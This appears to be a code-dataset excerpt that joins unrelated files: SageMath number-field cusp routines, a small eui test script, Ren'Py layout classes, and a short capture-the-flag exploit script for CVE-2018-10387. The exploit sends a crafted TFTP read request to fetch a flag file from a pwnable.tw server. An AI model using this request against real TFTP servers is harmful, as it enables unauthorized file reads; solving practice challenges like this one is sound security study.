sage: k.<a> = NumberField(x^3 + x + 1)
sage: kCusps = NFCusps(k)
Comparing with infinity::
sage: c = kCusps((a,2))
sage: d = kCusps(oo)
sage: c < d
True
sage: kCusps(oo) < d
False
Comparison as elements of the number field::
sage: kCusps(2/3) < kCusps(5/2)
False
sage: k(2/3) < k(5/2)
False
"""
if self.__b.is_zero():
if right.__b.is_zero():
return rich_to_bool(op, 0)
else:
return rich_to_bool(op, 1)
else:
if right.__b.is_zero():
return rich_to_bool(op, -1)
else:
return richcmp(self._number_field_element_(),
right._number_field_element_(), op)
def __neg__(self):
"""
The negative of this cusp.
EXAMPLES::
sage: k.<a> = NumberField(x^2 + 23)
sage: c = NFCusp(k, a, a+1); c
Cusp [a: a + 1] of Number Field in a with defining polynomial x^2 + 23
sage: -c
Cusp [-a: a + 1] of Number Field in a with defining polynomial x^2 + 23
"""
return NFCusp(self.parent().number_field(), -self.__a, self.__b)
def apply(self, g):
"""
Return g(``self``), where ``g`` is a 2x2 matrix, which we view as a
linear fractional transformation.
INPUT:
- ``g`` -- a list of integral elements [a, b, c, d] that are the
entries of a 2x2 matrix.
OUTPUT:
A number field cusp, obtained by the action of ``g`` on the cusp
``self``.
EXAMPLES::
sage: k.<a> = NumberField(x^2 + 23)
sage: beta = NFCusp(k, 0, 1)
sage: beta.apply([0, -1, 1, 0])
Cusp Infinity of Number Field in a with defining polynomial x^2 + 23
sage: beta.apply([1, a, 0, 1])
Cusp [a: 1] of Number Field in a with defining polynomial x^2 + 23
"""
k = self.number_field()
return NFCusp(k, g[0] * self.__a + g[1] * self.__b,
g[2] * self.__a + g[3] * self.__b)
def ideal(self):
"""
Return the ideal associated to the cusp ``self``.
EXAMPLES::
sage: k.<a> = NumberField(x^2 + 23)
sage: alpha = NFCusp(k, 3, a-1)
sage: alpha.ideal()
Fractional ideal (3, 1/2*a - 1/2)
sage: NFCusp(k, oo).ideal()
Fractional ideal (1)
"""
k = self.number_field()
return k.ideal(self.__a, self.__b)
def ABmatrix(self):
"""
Return AB-matrix associated to the cusp ``self``.
Given R a Dedekind domain and A, B ideals of R in inverse classes, an
AB-matrix is a matrix realizing the isomorphism between R+R and A+B.
An AB-matrix associated to a cusp [a1: a2] is an AB-matrix with A the
ideal associated to the cusp (A=<a1, a2>) and first column given by
the coefficients of the cusp.
EXAMPLES:
::
sage: k.<a> = NumberField(x^3 + 11)
sage: alpha = NFCusp(k, oo)
sage: alpha.ABmatrix()
[1, 0, 0, 1]
::
sage: alpha = NFCusp(k, 0)
sage: alpha.ABmatrix()
[0, -1, 1, 0]
Note that the AB-matrix associated to a cusp is not unique, and the
output of the ``ABmatrix`` function may change.
::
sage: alpha = NFCusp(k, 3/2, a-1)
sage: M = alpha.ABmatrix()
sage: M # random
[-a^2 - a - 1, -3*a - 7, 8, -2*a^2 - 3*a + 4]
sage: M[0] == alpha.numerator() and M[2]==alpha.denominator()
True
An AB-matrix associated to a cusp alpha will send Infinity to alpha:
::
sage: alpha = NFCusp(k, 3, a-1)
sage: M = alpha.ABmatrix()
sage: (k.ideal(M[1], M[3])*alpha.ideal()).is_principal()
True
sage: M[0] == alpha.numerator() and M[2]==alpha.denominator()
True
sage: NFCusp(k, oo).apply(M) == alpha
True
"""
k = self.number_field()
A = self.ideal()
if self.is_infinity():
return [1, 0, 0, 1]
if not self:
return [0, -1, 1, 0]
if A.is_principal():
B = k.ideal(1)
else:
B = k.ideal(A.gens_reduced()[1]) / A
assert (A * B).is_principal()
a1 = self.__a
a2 = self.__b
g = (A * B).gens_reduced()[0]
Ainv = A**(-1)
A1 = a1 * Ainv
A2 = a2 * Ainv
r = A1.element_1_mod(A2)
b1 = -(1 - r) / a2 * g
b2 = (r / a1) * g
ABM = [a1, b1, a2, b2]
return ABM
def is_Gamma0_equivalent(self, other, N, Transformation=False):
r"""
Check if cusps ``self`` and ``other`` are `\Gamma_0(N)`- equivalent.
INPUT:
- ``other`` -- a number field cusp or a list of two number field
elements which define a cusp.
- ``N`` -- an ideal of the number field (level)
OUTPUT:
- bool -- ``True`` if the cusps are equivalent.
- a transformation matrix -- (if ``Transformation=True``) a list of
integral elements [a, b, c, d] which are the entries of a 2x2 matrix
M in `\Gamma_0(N)` such that M * ``self`` = ``other`` if ``other``
and ``self`` are `\Gamma_0(N)`- equivalent. If ``self`` and ``other``
are not equivalent it returns zero.
EXAMPLES:
::
sage: K.<a> = NumberField(x^3-10)
sage: N = K.ideal(a-1)
sage: alpha = NFCusp(K, 0)
sage: beta = NFCusp(K, oo)
sage: alpha.is_Gamma0_equivalent(beta, N)
False
sage: alpha.is_Gamma0_equivalent(beta, K.ideal(1))
True
sage: b, M = alpha.is_Gamma0_equivalent(beta, K.ideal(1),Transformation=True)
sage: alpha.apply(M)
Cusp Infinity of Number Field in a with defining polynomial x^3 - 10
::
sage: k.<a> = NumberField(x^2+23)
sage: N = k.ideal(3)
sage: alpha1 = NFCusp(k, a+1, 4)
sage: alpha2 = NFCusp(k, a-8, 29)
sage: alpha1.is_Gamma0_equivalent(alpha2, N)
True
sage: b, M = alpha1.is_Gamma0_equivalent(alpha2, N, Transformation=True)
sage: alpha1.apply(M) == alpha2
True
sage: M[2] in N
True
"""
k = self.number_field()
other = NFCusp(k, other)
if not (self.ideal() / other.ideal()).is_principal():
if not Transformation:
return False
else:
return False, 0
reps = list_of_representatives(N)
alpha1 = NFCusp(k, self, lreps=reps)
alpha2 = NFCusp(k, other, lreps=reps)
delta = k.ideal(alpha1.__b) + N
if (k.ideal(alpha2.__b) + N) != delta:
if not Transformation:
return False
else:
return False, 0
M1 = alpha1.ABmatrix()
M2 = alpha2.ABmatrix()
A = alpha1.ideal()
B = k.ideal(M1[1], M1[3])
ABdelta = A * B * delta * delta
units = units_mod_ideal(ABdelta)
for u in units:
if (M2[2] * M1[3] - u * M1[2] * M2[3]) in ABdelta:
if not Transformation:
return True
else:
AuxCoeff = [1, 0, 0, 1]
Aux = M2[2] * M1[3] - u * M1[2] * M2[3]
if Aux in A * B * N:
if u != 1:
AuxCoeff[3] = u
else:
A1 = (A * B * N) / ABdelta
A2 = B * k.ideal(M1[2] * M2[2]) / (A * ABdelta)
f = A1.element_1_mod(A2)
w = ((1 - f) * Aux) / (M1[2] * M2[2])
AuxCoeff[3] = u
AuxCoeff[1] = w
from sage.matrix.all import Matrix
Maux = Matrix(k, 2, AuxCoeff)
M1inv = Matrix(k, 2, M1).inverse()
Mtrans = Matrix(k, 2, M2) * Maux * M1inv
assert Mtrans[1][0] in N
return True, Mtrans.list()
if not Transformation:
return False
else:
return False, 0
# *************************************************************************
# Global functions:
# - Gamma0_NFCusps --compute list of inequivalent cusps
# Internal use only:
# - number_of_Gamma0_NFCusps -- useful to test Gamma0_NFCusps
# - NFCusps_ideal_reps_for_levelN -- lists of reps for ideal classes
# - units_mod_ideal -- needed to check Gamma0(N)-equiv of cusps
# *************************************************************************
def Gamma0_NFCusps(N):
r"""
Return a list of inequivalent cusps for `\Gamma_0(N)`, i.e., a set of
representatives for the orbits of ``self`` on `\mathbb{P}^1(k)`.
INPUT:
- ``N`` -- an integral ideal of the number field k (the level).
OUTPUT:
A list of inequivalent number field cusps.
EXAMPLES::
sage: k.<a> = NumberField(x^2 + 5)
sage: N = k.ideal(3)
sage: L = Gamma0_NFCusps(N)
The cusps in the list are inequivalent::
sage: any(L[i].is_Gamma0_equivalent(L[j], N)
....: for i in range(len(L)) for j in range(len(L)) if i < j)
False
We test that we obtain the right number of orbits::
sage: from sage.modular.cusps_nf import number_of_Gamma0_NFCusps
sage: len(L) == number_of_Gamma0_NFCusps(N)
True
Another example::
sage: k.<a> = NumberField(x^4 - x^3 -21*x^2 + 17*x + 133)
sage: N = k.ideal(5)
sage: from sage.modular.cusps_nf import number_of_Gamma0_NFCusps
sage: len(Gamma0_NFCusps(N)) == number_of_Gamma0_NFCusps(N) # long time (over 1 sec)
True
"""
# We create L a list of three lists, which are different and each a list of
# prime ideals, coprime to N, representing the ideal classes of k
L = NFCusps_ideal_reps_for_levelN(N, nlists=3)
Laux = L[1] + L[2]
Lreps = list_of_representatives(N)
Lcusps = []
k = N.number_field()
for A in L[0]:
# find B in inverse class:
if A.is_trivial():
B = k.ideal(1)
# B = k.unit_ideal() produces an error because we need fract ideal
g = 1
else:
Lbs = [P for P in Laux if (P * A).is_principal()]
B = Lbs[0]
g = (A * B).gens_reduced()[0]
# for every divisor of N we have to find cusps
from sage.arith.all import divisors
for d in divisors(N):
# find delta prime coprime to B in inverse class of d*A
# by searching in our list of auxiliary prime ideals
Lds = [P for P in Laux
if (P * d * A).is_principal() and P.is_coprime(B)]
deltap = Lds[0]
a = (deltap * d * A).gens_reduced()[0]
I = d + N / d
# special case: A=B=d=<1>:
if a.is_one() and I.is_trivial():
Lcusps.append(NFCusp(k, 0, 1, lreps=Lreps))
else:
u = k.unit_group().gens()
for b in I.invertible_residues_mod(u):
# Note: if I trivial, invertible_residues_mod returns [1]
# lift b to (R/a)star
# we need the part of d which is coprime to I, call it M
M = d.prime_to_idealM_part(I)
deltAM = deltap * A * M
u = (B * deltAM).element_1_mod(I)
v = (I * B).element_1_mod(deltAM)
newb = u * b + v
# build AB-matrix:
# ----> extended gcd for k.ideal(a), k.ideal(newb)
Y = k.ideal(newb).element_1_mod(k.ideal(a))
# if xa + yb = 1, cusp = y*g /a
Lcusps.append(NFCusp(k, Y * g, a, lreps=Lreps))
return Lcusps
def number_of_Gamma0_NFCusps(N):
"""
Return the total number of orbits of cusps under the action of the
congruence subgroup `\\Gamma_0(N)`.
INPUT:
- ``N`` -- a number field ideal.
OUTPUT:
integer -- the number of orbits of cusps under Gamma0(N)-action.
EXAMPLES::
sage: k.<a> = NumberField(x^3 + 11)
sage: N = k.ideal(2, a+1)
sage: from sage.modular.cusps_nf import number_of_Gamma0_NFCusps
sage: number_of_Gamma0_NFCusps(N)
4
sage: L = Gamma0_NFCusps(N)
sage: len(L) == number_of_Gamma0_NFCusps(N)
True
sage: k.<a> = NumberField(x^2 + 7)
sage: N = k.ideal(9)
sage: number_of_Gamma0_NFCusps(N)
6
sage: N = k.ideal(a*9 + 7)
sage: number_of_Gamma0_NFCusps(N)
24
"""
k = N.number_field()
# The number of Gamma0(N)-sub-orbits for each Gamma-orbit:
from sage.arith.all import divisors
Ugens = [k(u) for u in k.unit_group().gens()]
s = sum([len((d + N / d).invertible_residues_mod(Ugens))
for d in divisors(N)])
# There are h Gamma-orbits, with h class number of underlying number field.
return s * k.class_number()
def NFCusps_ideal_reps_for_levelN(N, nlists=1):
"""
Return a list of lists (``nlists`` different lists) of prime ideals,
coprime to ``N``, representing every ideal class of the number field.
INPUT:
- ``N`` -- number field ideal.
- ``nlists`` -- optional (default 1). The number of lists of prime ideals
we want.
OUTPUT:
A list of lists of ideals representatives of the ideal classes, all coprime
to ``N``, representing every ideal.
EXAMPLES::
sage: k.<a> = NumberField(x^3 + 11)
sage: N = k.ideal(5, a + 1)
sage: from sage.modular.cusps_nf import NFCusps_ideal_reps_for_levelN
sage: NFCusps_ideal_reps_for_levelN(N)
[(Fractional ideal (1), Fractional ideal (2, a + 1))]
sage: L = NFCusps_ideal_reps_for_levelN(N, 3)
sage: all(len(L[i]) == k.class_number() for i in range(len(L)))
True
::
sage: k.<a> = NumberField(x^4 - x^3 -21*x^2 + 17*x + 133)
sage: N = k.ideal(6)
sage: from sage.modular.cusps_nf import NFCusps_ideal_reps_for_levelN
sage: NFCusps_ideal_reps_for_levelN(N)
[(Fractional ideal (1),
Fractional ideal (67, a + 17),
Fractional ideal (127, a + 48),
Fractional ideal (157, a - 19))]
sage: L = NFCusps_ideal_reps_for_levelN(N, 5)
sage: all(len(L[i]) == k.class_number() for i in range(len(L)))
True
"""
k = N.number_field()
G = k.class_group()
L = []
for i in range(nlists):
L.append([k.ideal(1)])
it = k.primes_of_degree_one_iter()
for I in G.list():
check = 0
if not I.is_principal():
Iinv = (I.ideal())**(-1)
while check < nlists:
J = next(it)
if (J * Iinv).is_principal() and J.is_coprime(N):
L[check].append(J)
check += 1
return [tuple(l) for l in L]
def units_mod_ideal(I):
"""
Return integral elements of the number field representing the images of
the global units modulo the ideal ``I``.
INPUT:
- ``I`` -- number field ideal.
OUTPUT:
A list of integral elements of the number field representing the images of
the global units modulo the ideal ``I``. Elements of the list might be
equivalent to each other mod ``I``.
EXAMPLES::
sage: from sage.modular.cusps_nf import units_mod_ideal
sage: k.<a> = NumberField(x^2 + 1)
sage: I = k.ideal(a + 1)
sage: units_mod_ideal(I)
[1]
sage: I = k.ideal(3)
sage: units_mod_ideal(I)
[1, a, -1, -a]
::
sage: from sage.modular.cusps_nf import units_mod_ideal
sage: k.<a> = NumberField(x^3 + 11)
sage: k.unit_group()
Unit group with structure C2 x Z of Number Field in a with defining polynomial x^3 + 11
sage: I = k.ideal(5, a + 1)
sage: units_mod_ideal(I)
[1,
2*a^2 + 4*a - 1,
...]
::
sage: from sage.modular.cusps_nf import units_mod_ideal
sage: k.<a> = NumberField(x^4 - x^3 -21*x^2 + 17*x + 133)
sage: k.unit_group()
Unit group with structure C6 x Z of Number Field in a with defining polynomial x^4 - x^3 - 21*x^2 + 17*x + 133
sage: I = k.ideal(3)
sage: U = units_mod_ideal(I)
sage: all(U[j].is_unit() and (U[j] not in I) for j in range(len(U)))
True
"""
k = I.number_field()
Uk = k.unit_group()
Istar = I.idealstar(2)
ulist = Uk.gens_values()
elist = [Istar(I.ideallog(u)).order() for u in ulist]
from sage.misc.mrange import xmrange
return [k.prod(u**e for u, e in zip(ulist, ei)) for ei in xmrange(elist)]
| 32.717496 | 119 | 0.504195 |
acfa7ab1e8bb225595a0abde1b31832133d2efc4 | 336 | py | Python | eui_test.py | lixk/eui | 50286d390d3a31b87c111c9a0030bd1e28729bc8 | [
"MIT"
] | null | null | null | eui_test.py | lixk/eui | 50286d390d3a31b87c111c9a0030bd1e28729bc8 | [
"MIT"
] | null | null | null | eui_test.py | lixk/eui | 50286d390d3a31b87c111c9a0030bd1e28729bc8 | [
"MIT"
] | null | null | null | import os
import webbrowser
import eui
def say_hello(message):
print('receive message from js:', message)
eui.js('sayHello', message)
def startup_callback():
webbrowser.open(os.getcwd() + '/static/index.html')
handlers = {
'say_hello': say_hello
}
eui.start(handlers=handlers, startup_callback=startup_callback)
| 16 | 63 | 0.720238 |
acfa7b498e7f2bd8b4baf298caf57ef43270bab4 | 464 | py | Python | CVE-2018-10387/exploit.py | s3cc0mp/pwnable.tw_writeup | 4dae291358c1118e55559ebdd57e1d49860dc508 | [
"MIT"
] | 1 | 2021-03-31T11:02:37.000Z | 2021-03-31T11:02:37.000Z | CVE-2018-10387/exploit.py | wxrdnx/pwnable.tw_writeup | 4dae291358c1118e55559ebdd57e1d49860dc508 | [
"MIT"
] | null | null | null | CVE-2018-10387/exploit.py | wxrdnx/pwnable.tw_writeup | 4dae291358c1118e55559ebdd57e1d49860dc508 | [
"MIT"
] | null | null | null | from pwn import *
import struct
import socket
io = remote('chall.pwnable.tw', 10206)
io.recvuntil('start challenge on udp port: ')
port = int(io.recvlineS(keepends = False))
opcode = 1
flag_file = b'//home/opentftp/flag\0'
mode = b'ascii\0'
payload = struct.pack('>H', 1) + flag_file + mode
opentftp = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
opentftp.sendto(payload, ('chall.pwnable.tw', port))
result = opentftp.recv(1024)
print(result)
io.close()
| 21.090909 | 59 | 0.719828 |
acfa7b8d4fdc8c9ddb8de9a6b6a6c0b379e37b60 | 54,394 | py | Python | renpy/display/layout.py | derektoub/Arven-s-DLD-Adventure | 0398f09127f729be9567d0a5d3bf4a6453fa8e48 | [
"CNRI-Python"
] | 1 | 2015-08-13T17:09:40.000Z | 2015-08-13T17:09:40.000Z | renpy/display/layout.py | derektoub/Arven-s-DLD-Adventure | 0398f09127f729be9567d0a5d3bf4a6453fa8e48 | [
"CNRI-Python"
] | null | null | null | renpy/display/layout.py | derektoub/Arven-s-DLD-Adventure | 0398f09127f729be9567d0a5d3bf4a6453fa8e48 | [
"CNRI-Python"
] | null | null | null | # Copyright 2004-2014 Tom Rothamel <pytom@bishoujo.us>
#
# Permission is hereby granted, free of charge, to any person
# obtaining a copy of this software and associated documentation files
# (the "Software"), to deal in the Software without restriction,
# including without limitation the rights to use, copy, modify, merge,
# publish, distribute, sublicense, and/or sell copies of the Software,
# and to permit persons to whom the Software is furnished to do so,
# subject to the following conditions:
#
# The above copyright notice and this permission notice shall be
# included in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE
# LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION
# OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION
# WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
# This file contains classes that handle layout of displayables on
# the screen.
from renpy.display.render import render, Render
import renpy.display
import pygame
def scale(num, base):
"""
If num is a float, multiplies it by base and returns that. Otherwise,
returns num unchanged.
"""
if isinstance(num, float):
return num * base
else:
return num
class Null(renpy.display.core.Displayable):
"""
:doc: disp_imagelike
A displayable that creates an empty box on the screen. The size
of the box is controlled by `width` and `height`. This can be used
when a displayable requires a child, but no child is suitable, or
as a spacer inside a box.
::
image logo spaced = HBox("logo.png", Null(width=100), "logo.png")
"""
def __init__(self, width=0, height=0, **properties):
super(Null, self).__init__(**properties)
self.width = width
self.height = height
def render(self, width, height, st, at):
rv = renpy.display.render.Render(self.width, self.height)
if self.focusable:
rv.add_focus(self, None, None, None, None, None)
return rv
class Container(renpy.display.core.Displayable):
"""
This is the base class for containers that can have one or more
children.
@ivar children: A list giving the children that have been added to
this container, in the order that they were added in.
@ivar child: The last child added to this container. This is also
used to access the sole child in containers that can only hold
one child.
@ivar offsets: A list giving offsets for each of our children.
It's expected that render will set this up each time it is called.
@ivar sizes: A list giving sizes for each of our children. It's
also expected that render will set this each time it is called.
"""
# We indirect all list creation through this, so that we can
# use RevertableLists if we want.
_list_type = list
def __init__(self, *args, **properties):
self.children = self._list_type()
self.child = None
self.offsets = self._list_type()
for i in args:
self.add(i)
super(Container, self).__init__(**properties)
def set_style_prefix(self, prefix, root):
super(Container, self).set_style_prefix(prefix, root)
for i in self.children:
i.set_style_prefix(prefix, False)
def add(self, d):
"""
Adds a child to this container.
"""
child = renpy.easy.displayable(d)
self.children.append(child)
self.child = child
self.offsets = self._list_type()
def _clear(self):
self.child = None
self.children = self._list_type()
self.offsets = self._list_type()
renpy.display.render.redraw(self, 0)
def remove(self, d):
"""
Removes the first instance of child from this container. May
not work with all containers.
"""
for i, c in enumerate(self.children):
if c is d:
break
else:
return
self.children.pop(i) # W0631
self.offsets = self._list_type()
if self.children:
self.child = self.children[-1]
else:
self.child = None
def update(self):
"""
This should be called if a child is added to this
displayable outside of the render function.
"""
renpy.display.render.invalidate(self)
def render(self, width, height, st, at):
rv = Render(width, height)
self.offsets = self._list_type()
for c in self.children:
cr = render(c, width, height, st, at)
offset = c.place(rv, 0, 0, width, height, cr)
self.offsets.append(offset)
return rv
def event(self, ev, x, y, st):
children = self.children
offsets = self.offsets
for i in xrange(len(offsets) - 1, -1, -1):
d = children[i]
xo, yo = offsets[i]
rv = d.event(ev, x - xo, y - yo, st)
if rv is not None:
return rv
return None
def visit(self):
return self.children
# These interact with the ui functions to allow use as a context
# manager.
def __enter__(self):
renpy.ui.context_enter(self)
return self
def __exit__(self, exc_type, exc_val, exc_tb):
renpy.ui.context_exit(self)
return False
def LiveComposite(size, *args, **properties):
"""
:doc: disp_imagelike
This creates a new displayable of `size`, by compositing other
displayables. `size` is a (width, height) tuple.
The remaining positional arguments are used to place images inside
the LiveComposite. The remaining positional arguments should come
in groups of two, with the first member of each group an (x, y)
tuple, and the second member of a group is a displayable that
is composited at that position.
Displayables are composited from back to front.
::
image eileen composite = LiveComposite(
(300, 600),
(0, 0), "body.png",
(0, 0), "clothes.png",
(50, 50), "expression.png")
"""
properties.setdefault('style', 'image_placement')
width, height = size
rv = Fixed(xmaximum=width, ymaximum=height, xminimum=width, yminimum=height, **properties)
if len(args) % 2 != 0:
raise Exception("LiveComposite requires an odd number of arguments.")
for pos, widget in zip(args[0::2], args[1::2]):
xpos, ypos = pos
rv.add(Position(renpy.easy.displayable(widget),
xpos=xpos, xanchor=0, ypos=ypos, yanchor=0))
return rv
class Position(Container):
"""
Controls the placement of a displayable on the screen, using
supplied position properties. This is the non-curried form of
Position, which should be used when the user has directly created
the displayable that will be shown on the screen.
"""
def __init__(self, child, style='image_placement', **properties):
"""
@param child: The child that is being laid out.
@param style: The base style of this position.
@param properties: Position properties that control where the
child of this widget is placed.
"""
super(Position, self).__init__(style=style, **properties)
self.add(child)
def render(self, width, height, st, at):
surf = render(self.child, width, height, st, at)
self.offsets = [ (0, 0) ]
rv = renpy.display.render.Render(surf.width, surf.height)
rv.blit(surf, (0, 0))
return rv
def get_placement(self):
xpos, ypos, xanchor, yanchor, xoffset, yoffset, subpixel = self.child.get_placement()
v = self.style.xpos
if v is not None:
xpos = v
v = self.style.ypos
if v is not None:
ypos = v
v = self.style.xanchor
if v is not None:
xanchor = v
v = self.style.yanchor
if v is not None:
yanchor = v
v = self.style.xoffset
if v is not None:
xoffset = v
v = self.style.yoffset
if v is not None:
yoffset = v
v = self.style.subpixel
if v is not None:
subpixel = v
return xpos, ypos, xanchor, yanchor, xoffset, yoffset, subpixel
class Grid(Container):
"""
A grid is a widget that evenly allocates space to its children.
The child widgets should not be greedy, but should instead be
widgets that only use part of the space available to them.
"""
def __init__(self, cols, rows, padding=None,
transpose=False,
style='grid', **properties):
"""
@param cols: The number of columns in this widget.
@params rows: The number of rows in this widget.
@params transpose: True if the grid should be transposed.
"""
if padding is not None:
properties.setdefault('spacing', padding)
super(Grid, self).__init__(style=style, **properties)
cols = int(cols)
rows = int(rows)
self.cols = cols
self.rows = rows
self.transpose = transpose
def render(self, width, height, st, at):
# For convenience and speed.
padding = self.style.spacing
cols = self.cols
rows = self.rows
if len(self.children) != cols * rows:
if len(self.children) < cols * rows:
raise Exception("Grid not completely full.")
else:
raise Exception("Grid overfull.")
if self.transpose:
children = [ ]
for y in range(rows):
for x in range(cols):
children.append(self.children[y + x * rows])
else:
children = self.children
# Now, start the actual rendering.
renwidth = width
renheight = height
if self.style.xfill:
renwidth = (width - (cols - 1) * padding) / cols
if self.style.yfill:
renheight = (height - (rows - 1) * padding) / rows
renders = [ render(i, renwidth, renheight, st, at) for i in children ]
sizes = [ i.get_size() for i in renders ]
cwidth = 0
cheight = 0
for w, h in sizes:
cwidth = max(cwidth, w)
cheight = max(cheight, h)
if self.style.xfill:
cwidth = renwidth
if self.style.yfill:
cheight = renheight
width = cwidth * cols + padding * (cols - 1)
height = cheight * rows + padding * (rows - 1)
rv = renpy.display.render.Render(width, height)
offsets = [ ]
for y in range(0, rows):
for x in range(0, cols):
child = children[ x + y * cols ]
surf = renders[x + y * cols]
xpos = x * (cwidth + padding)
ypos = y * (cheight + padding)
offset = child.place(rv, xpos, ypos, cwidth, cheight, surf)
offsets.append(offset)
if self.transpose:
self.offsets = [ ]
for x in range(cols):
for y in range(rows):
self.offsets.append(offsets[y * cols + x])
else:
self.offsets = offsets
return rv
class IgnoreLayers(Exception):
"""
Raise this to have the event ignored by layers, but reach the
underlay.
"""
pass
class MultiBox(Container):
layer_name = None
first = True
order_reverse = False
def __init__(self, spacing=None, layout=None, style='default', **properties):
if spacing is not None:
properties['spacing'] = spacing
super(MultiBox, self).__init__(style=style, **properties)
self.default_layout = layout
# The start and animation times for children of this
# box.
self.start_times = [ ]
self.anim_times = [ ]
# A map from layer name to the widget corresponding to
# that layer.
self.layers = None
# The scene list for this widget.
self.scene_list = None
def _clear(self):
super(MultiBox, self)._clear()
self.start_times = [ ]
self.anim_times = [ ]
self.layers = None
self.scene_list = None
def _in_old_scene(self):
if self.layer_name is not None:
if self.scene_list is None:
return self
scene_list = [ ]
changed = False
for old_sle in self.scene_list:
new_sle = old_sle.copy()
d = new_sle.displayable._in_old_scene()
if d is not new_sle.displayable:
new_sle.displayable = d
changed = True
scene_list.append(new_sle)
if not changed:
return self
rv = MultiBox(layout=self.default_layout)
rv.layer_name = self.layer_name
rv.append_scene_list(scene_list)
elif self.layers:
rv = MultiBox(layout=self.default_layout)
rv.layers = { }
changed = False
for layer in renpy.config.layers:
old_d = self.layers[layer]
new_d = old_d._in_old_scene()
if new_d is not old_d:
changed = True
rv.add(new_d)
rv.layers[layer] = new_d
if not changed:
return self
else:
return self
if self.offsets:
rv.offsets = list(self.offsets)
if self.start_times:
rv.start_times = list(self.start_times)
if self.anim_times:
rv.anim_times = list(self.anim_times)
return rv
def __unicode__(self):
layout = self.style.box_layout
if layout is None:
layout = self.default_layout
if layout == "fixed":
return "Fixed"
elif layout == "horizontal":
return "HBox"
elif layout == "vertical":
return "VBox"
else:
return "MultiBox"
def add(self, widget, start_time=None, anim_time=None): # W0221
super(MultiBox, self).add(widget)
self.start_times.append(start_time)
self.anim_times.append(anim_time)
def append_scene_list(self, l):
for sle in l:
self.add(sle.displayable, sle.show_time, sle.animation_time)
if self.scene_list is None:
self.scene_list = [ ]
self.scene_list.extend(l)
def render(self, width, height, st, at):
# Do we need to adjust the child times due to our being a layer?
if self.layer_name or (self.layers is not None):
adjust_times = True
else:
adjust_times = False
xminimum = self.style.xminimum
if xminimum is not None:
width = max(width, scale(xminimum, width))
yminimum = self.style.yminimum
if yminimum is not None:
height = max(height, scale(yminimum, height))
if self.first:
self.first = False
if adjust_times:
it = renpy.game.interface.interact_time
self.start_times = [ i or it for i in self.start_times ]
self.anim_times = [ i or it for i in self.anim_times ]
layout = self.style.box_layout
if layout is None:
layout = self.default_layout
self.layout = layout # W0201
else:
layout = self.layout
# Handle time adjustment, store the results in csts and cats.
if adjust_times:
t = renpy.game.interface.frame_time
csts = [ t - start for start in self.start_times ]
cats = [ t - anim for anim in self.anim_times ]
else:
csts = [ st ] * len(self.children)
cats = [ at ] * len(self.children)
offsets = [ ]
if layout == "fixed":
rv = None
if self.style.order_reverse:
iterator = zip(reversed(self.children), reversed(csts), reversed(cats))
else:
iterator = zip(self.children, csts, cats)
for child, cst, cat in iterator:
surf = render(child, width, height, cst, cat)
if rv is None:
if self.style.fit_first:
width, height = surf.get_size()
rv = renpy.display.render.Render(width, height, layer_name=self.layer_name)
if surf:
offset = child.place(rv, 0, 0, width, height, surf)
offsets.append(offset)
else:
offsets.append((0, 0))
if rv is None:
rv = renpy.display.render.Render(width, height, layer_name=self.layer_name)
if self.style.order_reverse:
offsets.reverse()
self.offsets = offsets
return rv
# If we're here, we have a box, either horizontal or vertical. Which is good,
# as we can share some code between boxes.
spacing = self.style.spacing
first_spacing = self.style.first_spacing
if first_spacing is None:
first_spacing = spacing
spacings = [ first_spacing ] + [ spacing ] * (len(self.children) - 1)
box_wrap = self.style.box_wrap
xfill = self.style.xfill
yfill = self.style.yfill
# The shared height and width of the current line. The line_height must
# be 0 for a vertical box, and the line_width must be 0 for a horizontal
# box.
line_width = 0
line_height = 0
# The children to layout.
children = list(self.children)
if self.style.box_reverse:
children.reverse()
spacings.reverse()
# a list of (child, x, y, w, h, surf) tuples that are turned into
# calls to child.place().
placements = [ ]
# The maximum x and y.
maxx = 0
maxy = 0
def layout_line(line, xfill, yfill):
"""
Lays out a single line.
`line` a list of (child, x, y, surf) tuples.
`xfill` the amount of space to add in the x direction.
`yfill` the amount of space to add in the y direction.
"""
xfill = max(0, xfill)
yfill = max(0, yfill)
if line:
xperchild = xfill / len(line)
yperchild = yfill / len(line)
else:
xperchild = 0
yperchild = 0
maxxout = maxx
maxyout = maxy
for i, (child, x, y, surf) in enumerate(line):
sw, sh = surf.get_size()
sw = max(line_width, sw)
sh = max(line_height, sh)
x += i * xperchild
y += i * yperchild
sw += xperchild
sh += yperchild
placements.append((child, x, y, sw, sh, surf))
maxxout = max(maxxout, x + sw)
maxyout = max(maxyout, y + sh)
return maxxout, maxyout
x = 0
y = 0
full_width = False
full_height = False
if layout == "horizontal":
full_height = yfill
line_height = 0
line = [ ]
remwidth = width
for d, padding, cst, cat in zip(children, spacings, csts, cats):
if box_wrap:
rw = width
else:
rw = remwidth
surf = render(d, rw, height - y, cst, cat)
sw, sh = surf.get_size()
if box_wrap and remwidth - sw - padding <= 0 and line:
maxx, maxy = layout_line(line, remwidth if xfill else 0, 0)
y += line_height
x = 0
line_height = 0
remwidth = width
line = [ ]
line.append((d, x, y, surf))
line_height = max(line_height, sh)
x += sw + padding
remwidth -= (sw + padding)
maxx, maxy = layout_line(line, remwidth if xfill else 0, 0)
elif layout == "vertical":
full_width = xfill
line_width = 0
line = [ ]
remheight = height
for d, padding, cst, cat in zip(children, spacings, csts, cats):
if box_wrap:
rh = height
else:
rh = remheight
surf = render(d, width - x, rh, cst, cat)
sw, sh = surf.get_size()
if box_wrap and remheight - sh - padding <= 0:
maxx, maxy = layout_line(line, 0, remheight if yfill else 0)
x += line_width
y = 0
line_width = 0
remheight = height
line = [ ]
line.append((d, x, y, surf))
line_width = max(line_width, sw)
y += sh + padding
remheight -= (sh + padding)
maxx, maxy = layout_line(line, 0, remheight if yfill else 0)
else:
raise Exception("Unknown box layout: %r" % layout)
# Back to the common for vertical and horizontal.
if not xfill:
width = maxx
if not yfill:
height = maxy
rv = renpy.display.render.Render(width, height)
